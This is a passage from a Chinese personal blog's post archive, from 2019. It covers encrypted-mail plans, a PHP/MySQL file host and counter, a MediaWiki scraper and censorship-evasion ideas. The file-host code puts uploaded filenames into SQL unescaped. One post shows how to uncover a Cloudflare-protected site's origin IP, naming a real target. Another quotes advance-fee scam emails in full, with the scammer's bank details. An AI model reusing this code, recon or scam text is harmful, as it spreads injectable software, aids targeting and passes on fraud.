Downloader一样，打算套个表格完事。但是既然这个UI看起来挺简单，那就试试这个吧，反正我也不考虑兼容性问题了，WebAPI都用上了，再加一个这个也不算什么吧。对计划的补充计划的名称我打算命名为EncMail-Project （看起来有点俗……） ，不过这都不重要。   关于登录方面，我后来又想了想，没有人会记私钥的，所以为了方便使用，我打算通过AES加密私钥，和公钥一起上传到服务器上保存。登录时把加密的私钥和被公钥加密的令牌下载下来，然后输入密码解密获得私钥并解密令牌。   而之前想到的公钥被修改的问题，我想了想，那还是加上指纹吧（就是Hash啦），用SHA-256算法算出公钥的指纹，然后发送者在发送时自己对照一下就可以了（好像是SubtleCrypto.digest()？emmmm……这个文档没有翻译……）。   另外为了安全，私钥我打算存到sessionStorage里，以减小私钥泄露的危险。今天就先到这里吧！" },{ "title": "制作分布式加密邮件系统的计划", "category": "", "tags": "分布式, 加密, 邮件, 计划", "url": "/2019/07/02/encmail.html", "date": "2019/07/02", "content": "一个计划还没开始，又开始另一个计划了……计划原因之前用了Telegram聊天，里面有一个私密通信的功能。听说这个功能可以让服务端没法知道使用者发送的信息。不过Telegram在国内使用限制比较多，所以我打算用HTML+Javascript+PHP+MySQL写一套自己的私密通信系统。   但是As We All Know，某些国家有网络审查，提供这种服务的肯定会被审查的。既然我们要做这个东西，就不能让它不稳定。所以我想把这个项目搞成分布式的那种，确保通信可以成功。（来自Mastodon的思路）Q&A  为什么使用PHP？   之所以用PHP作为后端语言的原因呢…… 当然因为PHP是世界上最好的语言！（被打死） 因为PHP的程序好搭建，而且很多虚拟主机商都用的是PHP，这样即使小白也能搭建，就能让分布式节点更多了。 （明明主要原因是我只会PHP 23333）  为什么我要做成邮件系统而不是聊天系统呢？   因为聊天就要用Websocket或者是AJAX之类的，但是我不会……我只能把信息都存在服务器里，有人访问再显示出来……  已经有PGP了，为什么还要重复造轮子呢？   因为PGP是软件，小白用起来不太方便，这个是网站，可能相对更简单一些。 （重复造轮子能有什么理由）项目技术原理  所谓的私密通信主要用的就是非对称加密，比如说RSA什么的。所以这个项目同样如此，也使用RSA作为主要加密算法。  RSA虽然很不错，但是似乎加密速度比较慢？（我看HTTPS上介绍的是这样）所以内容用AES加密，用随机数做密码，一方用公钥去加密这个密码，另一方用私钥解密获得密码，然后再利用这个密码进行对称加密传输（和HTTPS差不多）。  如果上述操作都是服务端进行，那这些就都没什么意义了，所以我们要在客户端进行。像Javascript进行加密完全没有问题，所以除了传输，其他加密都是在浏览器上进行。项目细节为了方便通信，公钥是要留在服务器上的，所以要搞一个用户系统，存储用户的公钥。在注册的过程中公私钥生成都是在客户端进行，确保服务端得不到用户的私钥，注册的过程中要将用户名和公钥上传至服务器保存。这就是为什么要用到MySQL。   登录时，先输入用户名，服务器使用用户名查找到对应的公钥，然后生成一个随机数，用公钥加密，发送给客户端，客户端用私钥解密，获得随机数，返回给服务器进行登录。   私钥登录后要持续保存，这时肯定不能用Cookie，我们可以用localStorage，然后客户端一定要做好防XSS，不然一切都没有了。   在发送的时候，我们可以搞一个类似Mastodon的用户名，两个@实在是太蠢了，就和E-mail一样，就搞成user@example.com的形式吧   在发送时客户端先检查对方服务器能否连接，如不能则测试通过服务器连接，如果服务器连接失败再使用其他节点连接（服务器内置），如果还是不行，用户可以自行输入节点，还是不行，投递失败。   连接成功后对方服务器查询对应用户的公钥，返回给客户端，客户端用这个公钥加密AES密码，用AES密码加密内容，然后再传给对方服务器保存。   查看邮件就用私钥解密AES密码，然后解密内容。问题如果对方服务器被攻陷，公钥被改成攻击者的，那不就没用了吗？虽然可以用指纹解决，但是这对小白来说似乎有些困难……HTTPS用的是第三方权威解决这个问题，我们就没办法了……   最大的问题是，什么时候开始动工？（笑）" },{ "title": "重建MaBBS的计划", "category": "", "tags": "MaBBS, 重构", "url": "/2019/07/01/mabbs.html", "date": "2019/07/01", "content": "这就是所谓的只擅长建立计划吧（笑）关于计划重构计划：Mabbs重构计划   需要重构的项目：Mabbs关于这个项目这个项目是我初中的时候就开始写的，当时我在网络上看到了一种很有意思的论坛，叫做Telnet BBS，貌似以前有名的高校都搞这个东西。那时刚好在用一个极其破烂的手机（Mem:256MiB,CPU:Spreadtrum SP8810,Rom:512MiB）在那里学着写Shell（关于这一段历史）。看完Telnet BBS的介绍之后，我膨胀了，我觉得以我当时的水平，肯定能写出来，于是我从此走上了填这个万年巨坑的不归路。   当时我不但膨胀，而且傻，把一个有着很明显的注入漏洞的那么一个BBS写出来之后居然还发到当时Bilibili开的一个类似贴吧一样的东西里（现在已经没了），那时候每个路由器还是动态公开IP的，于是我就那么放在了网上，丝毫不担心有人会拿它当跳板机（是我想多了LOL）  在编写之中，我了解到了CGI，于是它就可以既能用网页版，又能用命令行版。   到现在为止，这个BBS仍然有很严重的注入漏洞……而且小时候写代码也没什么规范，基本上是边学边写，于是过了一个高三没写，那个代码我是一个字也看不懂了23333现在重构的打算本来是想写在那个Project里的，但是后来想了想，还是写成博客比较好，那个东西似乎不太适合我（就是想水一篇啦）1. FastCGI我很早以前就想把这个破烂CGI改成FastCGI，但是网上找了半天，基本上也没看懂什么。不过后来用上了服务器，学了Nginx，才明白，原来所谓的FastCGI就相当于是自己又写了一个服务器软件，只是这个比较简单，只是它不再是执行后就结束的程序，而是在后台挂着，继续等待下一个请求。而Nginx起到的作用就是提高这个自制服务器的安全性，另外可以提前输出，保证速度，其实说白了就是反向代理。这次看看重构能不能加一个这个功能。2. 前后端分离最近好像挺流行这个的，就是要用Javascript，不过这个我现在也学的差不多了，不像以前，整个BBS里没有一句Javascript。   这样干还有一个好处，就是我可以不限定客户端，假如我以后学了其他语言，就可以利用统一的API调用了3.POSIX这可是我写的东西的一大优点，我写的BBS就算是只有一个Busybox也能运行，保证了在任何一台设备上都能完美运行，而且一句sed、grep、awk都没有用，就连这三件套没有都能用哦！4. Hash&Session之前我写的BBS全部都是明文保存密码的，不过现在我学了那么多关于网络安全的知识，至少Hash还是要有的。不过我不打算用其他工具，我要自己写一套！之前确实是试了试Hash，不过感觉好像又不太对……回头再仔细查一下吧。   之前BBS登录时密码都是放在Cookie里的，现在想想那真是太蠢了，本来这个BBS就全都是XSS漏洞，再明文放密码那不就是想要谁的密码都可以吗？（虽然开了HTTPONLY）不过为了提高安全性，我搞了一个类似于Session的东西，但是我不太会写随机数，所以感觉这个Session似乎更不安全了…………真正的问题先想办法下决心写第一句话吧！" },{ "title": "如何利用MySQL数据库制作一个图站", "category": "", "tags": "MySQL, 数据库, 图站, PHP", "url": "/2019/06/24/up.html", "date": "2019/06/24", "content": "最近白嫖了一个500GB的数据库，想想怎么利用一下？Talk is cheap,show me the code数据库建表：CREATE TABLE `FileUP` ( `ID` int(11) NOT NULL AUTO_INCREMENT, `Name` text NOT NULL, `File` longblob NOT NULL, `Size` int(11) NOT NULL, PRIMARY KEY (`ID`)) ENGINE=InnoDB DEFAULT CHARSET=gb2312; PHP代码：<?php$con=mysqli_connect(\"数据库地址\",\"用户名\",\"密码\",\"数据库名\"); if (mysqli_connect_errno($con)) {     die(\"连接 MySQL 失败: \" . mysqli_connect_error()); }if ( $_GET[ID] != '' ) {    header('Access-Control-Allow-Origin: *');    $sql = \"SELECT * FROM `FileUP` WHERE `ID` = '\".addslashes($_GET[ID]).\"' \";    $result = $con->query($sql);    if ($result->num_rows > 0) {        while($row = $result->fetch_assoc()){          Header ( \"Content-type: application/octet-stream\" );          Header ( \"Accept-Ranges: bytes\" );          Header ( \"Accept-Length: \" . $row[\"Size\"] );          Header ( \"Content-Disposition: attachment; filename=\" . $row[\"Name\"] );        echo $row[\"File\"];    }}     else { header('HTTP/1.1 404 NOT FOUND'); }} else {echo '<title>Mayx图床</title><h1>Mayx图床</h1><hr>请选择需要上传的文件<form enctype=\"multipart/form-data\" method=\"post\" action=\"\">  <input type=\"file\" name=\"File\" />  <input type=\"submit\" name=\"submit\" value=\"submit\" /></form><br />';if ( $_SERVER['REQUEST_METHOD'] == \"POST\" ) { $error = $_FILES['File']['error']; $tmp_name = $_FILES['File']['tmp_name']; $size = $_FILES['File']['size']; $name = $_FILES['File']['name']; print(\"\\n\"); if ($error == UPLOAD_ERR_OK && $size > 0) {  $fp = fopen($tmp_name, 'r');  $content = fread($fp, $size);  fclose($fp);    $content = addslashes($content);  $sql = \"INSERT INTO `FileUP` (`Name`, `File`, `Size`) VALUES ('\".$name.\"', '\".$content.\"', '\".$size.\"');\";  $con->query($sql);  $sql = \"select @@identity;\";  $result = $con->query($sql);while($row = $result->fetch_assoc()) {echo '上传完成，文件下载地址：<a href=\"//'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'].\"?ID=\".$row['@@identity'].'\" >'.$_SERVER['HTTP_X_FORWARDED_PROTO'].'://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'].\"?ID=\".$row['@@identity'].'</a>';} } else {  echo \"文件上传错误！\"; }}echo '<hr /><center><a href=\"https://mabbs.github.io/\">By Mayx</a></center>';}mysqli_close($con);缺点MySQL保存文件有限制，好像只能存16MB左右😓（改max_allowed_packet就可以了）   另外就是断点续传的问题，这个问题我回头再想一想吧。演示（随时GG）https://mayx.leanapp.cn/up.php下一步改进的打算想搞成切片上传，这样就没有文件大小上传的限制了。   不过这个好像得前端支持，先放个链接在这里吧：https://github.com/fex-team/webuploader    不打算改进了……" },{ "title": "如何自己写一个博客计数器", "category": "", "tags": "计数器", "url": "/2019/06/22/counter.html", "date": "2019/06/22", "content": "都怪LeanCloud，我得自己写计数器了！事件起因我之前用的博客计数器是用的LeanCloud作为后台制作的计数器，然后嘛……代码是抄的。结果最近LeanCloud凉了，这让我无法忍受，之前的代码我也看不懂，改也不会改……   那好吧，我只好自己写计数器了。   于是我花了很长时间，自己写了一个计数器，另外还得把原来的计数器信息转移过来……使用方法前端部分主页显示点击数：Hits: <span id=\"{{ post.url }}\" class=\"visitors-index\" >Loading...</span> 内页显示点击数： Hits: <span id=\"{{ page.url }}\" class=\"visitors\" >Loading...</span> JS代码：（需要Jquery）var auxiliaryHost = \"你的域名\";function showHitS(hits){    $.get(auxiliaryHost+\"/counter.php?action=show&id=\"+hits.id,function(data){            hits.innerHTML=Number(data);        });}function showHitCount() {    var visitors=$(\".visitors-index\");    for(var i = 0; i < visitors.length; i++){        showHitS(visitors[i]);    }    }function addCount() {var visitors=$(\".visitors\");    $.get(auxiliaryHost+\"/counter.php?action=add&id=\"+visitors[0].id,function(data){        visitors[0].innerHTML=Number(data);    });}if ($('.visitors').length == 1) {    addCount();} else if ($('.visitors-index').length > 0){    showHitCount();}2021.03.23更新：修复了一些BUG并且支持异步了后端部分MySQL建表：CREATE TABLE `counter` (  `url` char(50) NOT NULL,  `counter` int(11) NOT NULL,  UNIQUE KEY `url` (`url`));PHP：<?phpheader('Access-Control-Allow-Origin: *');$db = new PDO(\"mysql:host=MySQL地址;dbname=数据库名\", \"用户名\", \"密码\", array(PDO::ATTR_PERSISTENT => true));if (isset($_GET['id'])){    $hid = (string)md5($_GET['id']);} else {    header(\"HTTP/1.1 301 Moved Permanently\");    header(\"Location: https://mabbs.github.io\");    exit(0);}$select = $db->prepare(\"SELECT IFNULL((SELECT `counter` FROM `counter` WHERE `url` = ?), 0) count\");$select->execute(array($hid));$counter = $select->fetch(PDO::FETCH_ASSOC)['count'];if (isset($_GET['action'])){    if ($_GET['action'] == \"add\") {        $counter = $counter + 1;        $insert = $db->prepare(\"INSERT INTO `counter` (`url`, `counter`) VALUES (?, ?) ON DUPLICATE KEY UPDATE `counter` = ?\");        $insert->execute(array($hid, $counter, $counter));    }}echo $counter;2022.07.26更新：之前的代码实在是太垃圾了，现在最起码PHP也会的差不多了，稍微优化一下。结果看来还是自己写代码放心，至少服务是自己维护的，不像垃圾LeanCloud坏掉之后我就无能为力了……   不过说实话我根本不会JS（虽然我之前说我学这个），编写之中遇到了不少问题，所以在此感谢各位帮助我的各位大佬们，让我最终完成了这个计数器。" },{ "title": "Mayx被外国人骗了？！", "category": "", "tags": "Mayx, 外国人, 骗子", "url": "/2019/06/10/cheat.html", "date": "2019/06/10", "content": "简直不可思议，我要把这个锅扔给百度翻译！（百度翻译表示不接这个锅23333）事件发展这个事件发生在高考前，现在高考结束了来总结一下   有一天，有一个叫做Lori Robinson的外国人给我发了一封邮件，内容如下：  Hello dear,  Thanks  so  much for coming into my life the time I needed you most. I have decided to spend the rest of my energy in building a home with you, firstly, we have to accept our faith that this journey of love will not be so easy or rosy, but be assured that nothing good comes very easy and we need to be strong and be ready to stand for each other. I have decided to moving my assets to your country so I can forward for my retirement but I want to take an official leave so I can visit you in your country ,I have made some good fortune in this war zone, You know I offer contract security network for the crude oil lifting in Iraq and also I fund local miners to mine and extract gold and diamonds, at least 150 people are working in my mining concession legally given to me by the Afghan government, in return I have an NGO housing, clothing, feeding and education 100 motherless kids.  I am interested to moving my generated funds, gold and diamonds and The funds is $3.5,000,000 ( Three  Million, five hundred thousand US Dollars) the Gold is 1730kgs of gold and the diamonds is 25,000carats parcel of uncut diamonds,I am a woman who does things according to the guidelines of my spirit, you was chosen to be my partner and also to help me to get this box, because my mind testify that you are the right person for me and I know you will not disappoint me , I chose to use you as a partner in this deal, because I’m not allowed to send the package to all of my friends or relatives as i am  still in the military outside the United States, though at the end if i send anything to the USA it will be suspicious and I be will query for the action, so I chose you because I know you are the ideal person for this deal as a foreigner who is not a US citizen.  Please put away the fear or doubt, and make up your mind to help me in this matter, I promise you will not regret it been part of this matter, I do not know what else I can say to convince you and make you believe me, but I I pray that God will give you the grace to make up your mind,Once again I want you to know that there is no complication in the way, if you follow my instructions everything will go smoothly and well in the process of receiving the case, please try to keep this secret matter between you and me, to avoid making space to the enemy, because if you and I should agree on one thing with our heart with seriousness we must surely achieve success in the end.  Please I want to mention once again that any disposition toward this project is intact between each of us and in no circumstances should you let the security company to know the contents of the box, remember that the box was registered as a diplomat for the package security company and that is what they believe to be in the box, so you should not let them know that the content of the box is money.  Please I will like you to send your information to me so that I can pass on to security cargo company to allow them to proceed to your country for the final delivery of cash at your door step. Send your information to me urgently;  Your full names: ……….. Your age: ……….. Your Address: ………….. ZIP CODE: …………….. City: …………………. Country: ………………. Phone number: ……… Profession: …………….  Once i am done with my official assignment, I will come to meet you one on one in your country, and after that we will have to decide how to carry on with our lives, but for now, please, I appreciate us to pay more attention to this issue, you receive the delivery and keep it safe until I come over to discuss with you on how best to invest it in your country  I await your immediate response Kiss Loris Robinsonemmmm写的不错，不过看不太懂……算啦，丢到百度翻译上看看吧，结果大意就是她有好多好多钱、钻石、金块和矿，然后想给我，让我把我的地址发给她，好让她邮过来。   不过这不是最重要的，重要的是她想和我结婚？！要知道我才高中刚毕业，于是我向她提出了这个疑问，得到的回答是：  Remember that distance or color does not matter even our age but love matters a lot in life , I am a woman who does things according to the guidelines of my spirit, you was chosen to be my partner and also to help me to get this fund, because my mind testify that you are the right person for me and I know you will not disappoint me , I chose to use you as a partner in this deal, because I’m not allowed to send the package to all of my friends or relatives as i am  still in the military outside the United States.哦，说的很有道理的样子，年龄无所谓，那是不是Lolicon也可以满足了？反正我的信息也值不了多少钱，那就给吧，于是我给她发了我的收件地址。然后她给我回信：  PLEASE CONTACT THE TRADING COMPANY NOW  I have contacted the courier company (Express Delivery Parcel Service ) that they are reliable and reliable.Once again I want you to know that there is no complication in the way, if you follow my instructions everything will go smoothly and well in the process of receiving the case, please try to keep this secret matter between you and me, to avoid making space to the enemy, because if you and I should agree on one thing with our heart with seriousness we must surely achieve success in the end.  This delivery is going to be handle legally by the Express Delivery Parcel Service and there will be no form of risk in the process and the money will be sealed pack safely in a Diplomatic Box and the Diplomatic Box will be deliver to you in your country by a Diplomat. I have decide to compensate you with 30% of the total money once after the $3.5,000,000 ( Three  Million, five hundred thousand US Dollars), the Gold is 1730kgs of gold and the diamonds is 25,000carats parcel of uncut diamonds.is delivered to you, while the rest balance shall be my investment capital in your country.  Please I want to mention once again that any disposition toward this project is intact between each of us and in no circumstances should you let the security company to know the contents of the box, remember that the box was registered as a diplomat for the package security company and that is what they believe to be in the box, so you should not let them know that the content of the box is money.  I have chosen this fast service so that you can receive the package within 72 hours after departure, bring the package to your home address, the bank have registered it to Express Delivery Parcel Service shipping and handed it to the company through their agent here, The company is with all your details,Here at our military base, the government provides everything we need, our paycheck is paid to our bank account in the United States until we return home after the mission as long as I stay in Afghanistan, I can not receive or send The money you paid , I have paid for the registration of the shipment and I placed a shipment order to the shipping company for delivery of the box at your door step in your country. Please note that the diplomat does not know the contents of the box for security reasons and below is the company’s contact details,Please contact them now, tell them your name and country, that you are the right person to receive the cargo from Lory Robinson, a US Army officer.  Fill in this information and send it to the security company and inform me:  -------------------------------------------------   My name is ............. Permanent resident ........................ I'm communicating with Lori's report Robinson, Email: lori.j.robinson@usa.com  The company registers the shipment to the following address:Full names:Age:Address:Occupation:POSTCODES:City:Country:Phone number:Profession:--------------------------------------------------The delivery company's information is below:GLOBAL FASTWAY COURIER SERVICES / SAFETY COMPANY.E-MAIL: express.global@uymail.comE-MAIL: express.global@linuxmail.orgAv. Del General Perón, 3228008 Madrid,SpainTel. +34 612 520330DIRECTOR OF PARTICIPATIONMr. William Anderson----------------------------------------------- --- -------    Just write to the company in the above email immediately, the company will be provided as soon as you contact them, I have begun with the agreement to meet you in your country before it expires month. Allow me to stop so far and expect to receive your positive feedback once you contact the company. God bless you and your family.  Love you and Kisses. Love and care from, Lori Robinson大意就是让我把我的信息再转发给邮递公司吧，反正信息已经发过一次了，那再发一次也无所谓了吧，于是我给这个所谓的邮递公司发了我的信息，那个公司给我回复：  EUROPE HEAD OFFICE, GLOBAL BRAND EXPRESS COURIER SERVICES, INTERNATIONAL AND LOCAL SHIPPING SERVICES, Av. del General Perón, 32  28008 Madrid,  Spain, Tel +34 612 520330, E-mail:express.global@uymail.com  HE SHIPMENT / DELIVERY SITUATION REPORT OF YOUR CONSIGNMENT IN SPAIN:  ATTENTION: ADDRESS : ….. CITY  : ………….. COUNTRY ………….China TELL …………….+86  HE SHIPMENT / DELIVERY SITUATION REPORT OF YOUR CONSIGNMENT IN SPAIN:  The above subject matter refers,  The management of  Global Fast Way Courier Service want to notify you that your consignment/one cargo box has been registered with our shipment company with Registration ID: AFGH55870199SJH for delivery to your country as soon as the necessary shipment logistics and requirement are obtained.  we have earlier been informed about you by Your partner Loris Robinson , that she appointed you as the beneficiary to receive her shipment labelled (FAMILY TREASURE) a CONSIGNMENT/ONE CARGO BOX to your destination.  OUR SERVICE TYPE DELIVERY DURATION CHARGES/FEES:  Handling & Delivery Cost……570 Euro Insurance……………………..690 Euro Total Cost……………………1,260 Euro Length of Days………………………Two Days Order Number…………………………..UESTNL  Finally you are required to send the shipment and Insurance fee of 1,260 Eur to enable a proper facilitation and delivery of your consignment to your address in your country and note that the charges are best substantial because of the insurance cover we have undertaken in case of loss, damage or package breakage of your high priority consignment. We assume all responsibilities in case of any eventualities.  YOU CAN MAKE THE PAYMENT TO US THROUGH MONEYGRAM WITH OUR ACCOUNT AUDITOR’S INFORMATION,BUT THAT WILL BE WHEN YOU SEND US YOUR SCANNED COPY OF YOUR INTERNATIONAL PASSPORT OR DRIVER’S LICENSE,BEFORE WE CAN SEND YOU OUR ACCOUNT AUDITOR’S INFORMATION YOU WILL USE TO SEND THE 1,260 Euro. Thanks for your Co-operation.   WE PROMISE TO GRANT THE BEST OF OUR SERVICES TO ALL OUR CUSTOMERS & YOUR SATISFACTION IS OUR REPUTATION.  Yours Faithfully, Global Fast Way Courier Services DIRECTOR IN CHARGE  Mr William Anderson  Tel +34 612 520330然后还非常用心的配了一张快递单：注：由于隐私原因，涉及隐私的地方已经被删除 （尽管大家都知道我的手机号）     这个邮件当时也没细看，然后就给Lori Robinson说了我已经给他们发了我的信息，过了几天，她给我发：  Hello my love how are you doing ? Am so sorry you did not hear from me i was on duty i have not  hear from you today i hope all is well with you? I plead with you in the name of God to try your best to negotiate with the security delivery company I’m worried  because I can’t live without you right here. You’re my everything and Last night I did not sleep am worry about  you my love.  The delivery of the box to you holds a lot for us in the future. Once you receive the box, I will commence on the process of tendering resignation and once it is granted, I will come to your country for the  sharing of the fund and planning a better future and life together. I cannot wait to be on your arms.  Kiss Lori J Robinson嗯，不错，她又强调了一遍这个邮件，顺带着表现了一下关心，不过我当时在学校，然后我就和她说我在学校，不方便收Email。   当我回到家里，那个破公司给我发了一份邮件：  EUROPE HEAD OFFICE, GLOBAL BRAND EXPRESS COURIER SERVICES, INTERNATIONAL AND LOCAL SHIPPING SERVICES, Av. del General Perón, 32  28008 Madrid,  Spain, Tel +34 612 520330, E-mail:express.global@uymail.com  ATTENTION: ,  YOU HAVE HAVE TO SEND US YOUR SCANNED COPY OF YOUR INTERNATIONAL PASSPORT OR DRIVER’S LICENSE AND YOU CAN USE THIS INFORMATION AND SEND THIS MOREY TO OUR OFFICE  1,260 EURO AS SOON AS YOU MAKE THE PAYMENT SEND US THE PAYMENT DETAILS TO  NABLE US PROCESS AND COMMECE YOUR  SHIPMENT TO ARRIVE AT YOUR DOOR  STEI IN YOUR  COUNTRY WITHIN THE NEXT 3 WORKING DAYS. THE DATE AND CONFIRMED OF ARRIVAL WILL BE ISSUED TO YOU. YOU CAN MAKE THE PAYMENT TO US WITH OUR ACCOUNT AUDITOR’S INFORMATION AN STATED BELOW:  BANK : BBVA. ACC/IBAN: ES3501822659150201596186. Swift : BBVAESMMXXX. ACC NAME : ARCHER SAMUEL. Address: Bulevard Ciudad de VICAR 1245. Spain.  Thanks for your Co-operation. WE PROMISE TO GRANT THE BEST OF OUR SERVICES TO ALL OUR CUSTOMERS & YOUR SATISFACTION IS OUR REPUTATION.  Yours Faithfully, Global Fast Way Courier Services DIRECTOR IN CHARGE Mr William Anderson Tel +34 612 520330啊，要交钱的么……于是Mayx就立马付款,上当受骗了（才怪，我哪有那么多钱？）到这里一看就知道是骗子了，其实之前那个快递单仔细一看就是假的，那个条形码画的乱七八糟……   不过我还想聊下去，于是我给Lori Robinson说我付不起啊！于是她给我回复：  Hello sweetheart,  Hello how are you doing and your school i hope you are doing good in school? I am very sorry my darling for late response to you, I had a hectic day and was very sick that was why I couldn’t get back to you, but I am fine and healthy again , Actually you are really trying for the success of this delivering box to you, in fact i thank you for all the efforts you have put on this already.But one thing you must know and understand is this, the express global company does not know that the content of the box is money and on no account should  you tell them that what is inside the box is money, i received massage from delivery company the asking you to pay the fee of 1260 .  I beg you to do anything within your means to comply with the security company so that you will receive this box, I have no access to money here and i do not know what else to do in this matter, the successful delivery of this box to you will determine how soon we will meet.  The U.S government provides everything that we need in the military base here, our salary are being paid into our Account via Bank of American Military banking in the United States, so i only have access to my account in U.S, but that will be after our assignment here in Syria, that’s why i cannot make any payment and i decided to ask for your help. I cannot access my bank account in America while in the battle field, I can only access my account when I am back to the states for security reasons, please understand me and do something OK.  My dear, i know you might not be happy with the response of the security delivery company asking you for some payment. so please i am counting and depending on you for the success of the fund. I believe in your ability to handle the project amicably with no delay so please i need your cooperation here to complete the security delivery company as soon as possible. I hope to hear from you as soon as you make the payment to them.  And remember this is our future and our love that we are talking about OK, Please kindly look for means even if it means to borrow or sale something, do it to sort out the bill so that the security delivery company will deliver the box to you, once I come back I really want to see you so that we will build life together.  Please you really have to try your best, you are the only hope i have now. and remember do not take this matter lighly.  Once the delive the funds,  to you I will come to meet you one on one in your country, and after that we will have to decide how to carry on with our lives, but for now, please, I appreciate us to pay more attention to this issue, you receive the delivery and keep it safe until I come over to discuss with you on how best to invest it in your country  I await your immediate response Kiss Loris Robinson看这个意思是让我砸锅卖铁也要付这个钱？我可不干，然后她回复：  Dearest,  Hello thanks you for your message you send to me,I plead with you in the name of God to try your best to negotiate with the security delivery company and pay the fee,  At this very point we have no other option than to comply with the delivery company because if they open the box, it will be a very big problem for us. Sweetheart, please lets you do the needful at this very stage before the military seal on the box expires.  I want you to kindly write to the security company and tell them the amount of money you have with you and plead with them that you will send the balance to them as soon as you receive the box. Tell them the amount you can pay presently no matter how little let us see their response.  I await your immediate response Kiss Loris Robinson……emmmm懒得理她了，于是这个事件到此为止。结果Mayx没有任何损失，怎么能叫骗呢？可是她给我带来了希望，又给我绝望，是想当QB吗？（LOL）" },{ "title": "高考即将来临", "category": "", "tags": "高考", "url": "/2019/05/30/exam.html", "date": "2019/05/30", "content": "都要高考了，看什么Mediawiki API文档？！对此，我也实在是无言以对。而且上一篇博客写的那个代码实在是太智障了，就和我现在在高考(2019.06.07)马上来临时还在智障的写着博客一样的智障，而更加智障的是，我的成绩那么差，差本来就很智障，而我现在的行为可谓是智障中的智障，再加上看了文档后写的那智障代码，我真不知道该怎么描述自己的智障了……上一篇博客的智障之处多少图片就要请求多少次，简直是太智障了吧！为什么不一次性POST过去，然后用preg_match_all一解析不就完事了嘛！还非得等好几分钟一个一个解析那些地址……现在的智障之处2019年高考日的倒计时： 距今还有8天 (2019年06月07日 星期五，己亥年（猪年）五月初五)  这就不用解释了吧！怎么办？我能怎么办？我也很绝望啊～   如果以后有工作的话，说不定会变成工作狂吧（LOL）！" },{ "title": "使用PHP批量下载Mediawiki站点的图片", "category": "", "tags": "PHP, Mediawiki, 图片", "url": "/2019/05/27/wikipic.html", "date": "2019/05/27", "content": "又是万能的PHP!不过还是Mediawiki API的功劳   最近我为了备份一下某个Wiki站（Ta们把R18名字空间的东西删的一干二净 后来才知道原来转移到了一个Wiki上，真的是好久没关注了 ），然后学习了一下Mediawiki API来下载整个Wiki（Ta们把站点导出也给弄没了QAQ）   文本很好下载，但是Mediawiki的图片我不知道存在哪里，API文档翻烂了也没找到把图片解析成地址的API，那怎么办呢？解决方案“解析”？emmmm……parse？不错，正好有这么一个action，好的，那就这样搞吧！Code<?phpset_time_limit(0);ignore_user_abort();$list = array(\"图片数组\");    $arrlength=count($list);for($x=0;$x<$arrlength;$x++) {    $tmp = json_decode(file_get_contents(\"https://MediaWiki的地址/api.php?action=parse&text=[[File:\".$list[$x].\"]]&contentmodel=wikitext&formatversion=2&format=json\"),true);    $preg='/src=\"(.*?)\"/is';    preg_match($preg,$tmp[parse][text],$match);    $tt=$tt.\"    \".$match[1];}$markout = fopen(\"List.txt\", \"w\") or die(\"Unable to open file!\");fwrite($markout, $tt);fclose($markout);die(\"Finish\");?>P.S.如果需要获取该Wiki的所有图片，可以从api.php?action=query&list=allimages这里获取。" },{ "title": "如何不使用百度App打开搜索结果？", "category": "", "tags": "百度, 不使用", "url": "/2019/05/12/baidu.html", "date": "2019/05/12", "content": "在中国，还是百度用的多啊~起因不知何时起，百度的搜索结果几乎都要下载App才能查看，虽然不是很喜欢CSDN，但是百度全是CSDN的内容……百度用了很多年也实在是没心用其他的搜索引擎，但是百度App做的是公认的烂，实在不想用。   对于这个问题，我该怎么办呢？研究我发现，在百度跳转页面的地址里，有一个参数叫做web_url，这记录了实际要跳转的页面，虽然用插件应该更好，但是我不会~，所以我想了想，打算用JS解决这个问题。代码baidu.html用法打开Baidu移动页面转换器，然后打开百度移动版搜索的结果，一般要求下载百度App的URL开头是mbd.baidu.com。复制这个URL，粘贴到转换器里，提交后就会自动跳转到真正的页面了。" },{ "title": "如何“人肉”服务器？", "category": "", "tags": "服务器, CDN, IP", "url": "/2019/05/03/origip.html", "date": "2019/05/03", "content": "没错，我就是来安利Censys的！起因当今有不少网站都喜欢在外面套CDN，因为CDN既能加速，又能节约服务器带宽，还能保护服务器（没错，说的就是Cloudflare，不过不止Ta一家）。但是用了CDN后就不知道源站IP了，这还是挺糟糕的，那怎么办呢？方案不错，接下来该Censys出场了，假如我对ESUWiki感觉很不爽 （我花火学园服务器加域名一年也花不了$100，你ESUWiki倒好，一年$1000+，是在搞什么？） ，然后我发现Ta也套了一层Cloudflare。好，那么接下来就让我们打开Censys搜一下Ta吧！  以esu.wiki为关键词搜索，搜到IP:149.56.110.126 然后实际访问一下https://149.56.110.126，果然跳转到了ESUWiki，看来就是Ta了？   不过好像也不完全是这样，Ta先跳到https://weiki.esu.zone/，然后才跳到https://esu.wiki，这就很麻烦了……算啦，反正这个服务器肯定和ESUWiki脱不了干系~结果通过Censys可以找到不少Cloudflare后面的IP，但也不代表这就没救了，只要设置防火墙白名单就能解决！   Censys还有更多功能，像端口扫描之类的都可以，虽然也有其他类似的网站，不过既然Censys用的顺手， 而且名字又好听23333， 所以，就好好用Ta吧！" },{ "title": "Mayx的Anti-Ban计划", "category": "", "tags": "Mayx, Anti-Ban", "url": "/2019/04/27/antiban.html", "date": "2019/04/27", "content": "经过研究，网关管理没什么好怕的！起因众所周知，由于某些原因，互联网总是被上层网关所限制，所以为了解决这个问题，我研究了一下Ban的原理和Anti-Ban的方法。Ban的原理Ban网站的原理大概分为以下几点：   1.DNS缓存污染(Ban域名)   2.IP地址或传输层端口封锁(BanIP)   3.TCP重置攻击具体内容请自行前往Wikipedia自行查询（这个链接可没有特指哦~），在此不再详述。Anti-Ban的方案针对Ban域名的方案DNSSEC、DNSCrypt、DoT、DoH等等都可以解决这个问题，或者是不通过DNS，直接获得IP，然后发送Host头来获取网页内容也可以。我的想法是建立一个本地Proxy，先通过前面几种方案获得IP，然后发送Host，这里需要注意的是要通过HTTPS发送但是不使用SNI，因为SNI是不加密的，而且用代理就没必要一定要获得正确的证书。  